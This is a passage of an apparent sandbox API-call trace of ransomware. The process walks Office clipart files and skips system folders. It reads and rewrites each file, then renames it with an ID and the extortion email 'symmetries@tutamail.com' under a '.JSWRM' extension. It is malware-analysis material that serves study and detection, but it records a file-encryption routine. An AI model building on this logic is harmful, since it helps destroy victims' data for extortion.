lpWideCharStr="HH00688_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00688_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0079.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.034] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7084) returned 1 [0079.034] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ba0) returned 0x205850 [0079.034] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ba0, lpOverlapped=0x0) returned 1 [0079.036] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.036] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ba0, lpOverlapped=0x0) returned 1 [0079.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.036] CloseHandle (hObject=0x314) returned 1 [0079.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0079.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0079.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0079.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.037] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bba, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00693_.WMF", cAlternateFileName="")) returned 1 [0079.037] lstrcmpiW (lpString1="HH00693_.WMF", lpString2=".") returned 1 [0079.037] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="..") returned 1 [0079.037] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="...") returned 1 [0079.037] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="windows") returned -1 [0079.037] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="recovery") returned -1 [0079.038] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="perflogs") returned -1 [0079.038] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="documents and settings") returned 1 [0079.038] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.038] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="system volume information") returned -1 [0079.038] lstrcmpiW (lpString1="HH00693_.WMF", lpString2="msocache") returned -1 [0079.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00693_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00693_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00693_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00693_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00693_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00693_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.038] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.038] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.038] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7098) returned 1 [0079.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bb0) returned 0x205850 [0079.038] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1bb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1bb0, lpOverlapped=0x0) returned 1 [0079.040] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.040] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1bb0, lpOverlapped=0x0) returned 1 [0079.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.041] CloseHandle (hObject=0x314) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0079.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0079.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0079.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.042] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb20, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01013_.WMF", cAlternateFileName="")) returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2=".") returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="..") returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="...") returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="windows") returned -1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="recovery") returned -1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="perflogs") returned -1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="documents and settings") returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="system volume information") returned -1 [0079.042] lstrcmpiW (lpString1="HH01013_.WMF", lpString2="msocache") returned -1 [0079.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01013_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01013_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.043] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2848) returned 1 [0079.043] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x23fc98 [0079.043] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0079.047] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.047] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0079.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.047] CloseHandle (hObject=0x314) returned 1 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0079.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0079.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.048] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0079.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.048] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01015_.WMF", cAlternateFileName="")) returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2=".") returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="..") returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="...") returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="windows") returned -1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="recovery") returned -1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="perflogs") returned -1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="documents and settings") returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="system volume information") returned -1 [0079.048] lstrcmpiW (lpString1="HH01015_.WMF", lpString2="msocache") returned -1 [0079.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01015_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0079.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01015_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01015_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01015_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0079.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.049] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1148) returned 1 [0079.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x230a00 [0079.049] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, 